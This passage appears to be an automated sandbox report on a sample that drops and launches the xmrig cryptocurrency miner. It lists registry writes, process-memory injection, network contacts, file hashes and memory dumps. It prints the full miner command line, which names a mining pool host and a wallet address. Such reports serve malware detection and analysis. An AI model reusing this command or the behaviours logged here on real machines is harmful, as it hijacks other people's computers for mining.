02165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1212 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
N/A 10.127.0.1:12000 tcp
N/A 10.127.0.1:12000 tcp
N/A 10.127.0.1:12000 tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
BE 2.17.107.98:443 www.bing.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
N/A 10.127.0.1:12000 tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 195.98.74.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4476-14-0x0000028AFE4B0000-0x0000028AFE4D0000-memory.dmp

memory/4476-15-0x0000028AFFDC0000-0x0000028AFFDE0000-memory.dmp

memory/4476-16-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-19-0x0000028AFFDE0000-0x0000028AFFE00000-memory.dmp

memory/4476-18-0x0000028AFFE00000-0x0000028AFFE20000-memory.dmp

memory/4476-17-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-20-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-21-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-22-0x0000028AFFE00000-0x0000028AFFE20000-memory.dmp

memory/4476-23-0x0000028AFFDE0000-0x0000028AFFE00000-memory.dmp

memory/4476-24-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-25-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-26-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-27-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-28-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-29-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-30-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-31-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-32-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-33-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-34-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-35-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-36-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-37-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-38-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-39-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-40-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-41-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-42-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-43-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-44-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-45-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-46-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-47-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-48-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-49-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-50-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-51-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-52-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-53-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-54-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-55-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-56-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-57-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-58-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-59-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-60-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-61-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-62-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-63-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-64-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-65-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-66-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-67-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-68-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-69-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-70-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-71-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-72-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-73-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-74-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-75-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-76-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-77-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-78-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-79-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-80-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-81-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp

memory/4476-82-0x00007FF66C6B0000-0x00007FF66D1B3000-memory.dmp